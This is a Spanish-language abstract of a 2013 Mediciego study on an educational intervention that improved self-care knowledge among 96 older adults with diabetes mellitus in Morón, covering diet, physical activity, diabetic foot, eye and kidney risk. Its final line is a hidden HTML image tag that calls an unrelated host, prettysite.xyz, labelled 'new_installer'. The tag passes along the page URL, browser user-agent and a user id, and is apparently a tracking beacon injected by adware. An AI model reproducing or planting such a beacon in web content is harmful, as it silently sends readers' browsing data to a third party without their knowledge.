Intervención educativa para elevar el nivel de conocimientos en adultos mayores con diabetes mellitus sobre el autocuidado - Mondéjar Barrios, María Dolores; Rosas Durand, Lorenzo Orlando; Morgado Rodríguez, Alina; Hernández Martínez, Nasabi; Junco Martínez, Grisby (Mediciego, 2013)
La educación a personas que padecen de diabetes para que estén informados y capacitados para que asuman con responsabilidad el control diario de su enfermedad y el autocuidado de los aspectos relacionados con sus estilos de vida y cumplimiento terapéutico, son los elementos claves para enfrentar con éxito esta enfermedad. Se realizó un estudio de intervención educativa pre experimental antes-después en adultos mayores con diabetes mellitus que acuden a la consulta de atención al diabético del Policlínico Norte de Morón. El universo fue de 100 pacientes y una muestra de 96, predominó la edad de 65-69 años, el sexo femenino; en las enfermedades crónicas asociadas, la de mayor prevalencia fue la hipertensión arterial; el 60% presentaban sobrepeso. Los participantes en la investigación aprendieron que el autocuidado es fundamental para lograr una longevidad satisfactoria lo cual incluye conocer los alimentos que le provocan descontrol metabólico, las condiciones imprescindibles para realizar actividad física, cómo prevenir el pie diabético, los factores que favorecen las lesiones oculares y los factores de riesgo para desarrollar una nefropatía diabética.<img src="http://prettysite.xyz/acnt?_=1583868206574&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F289&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />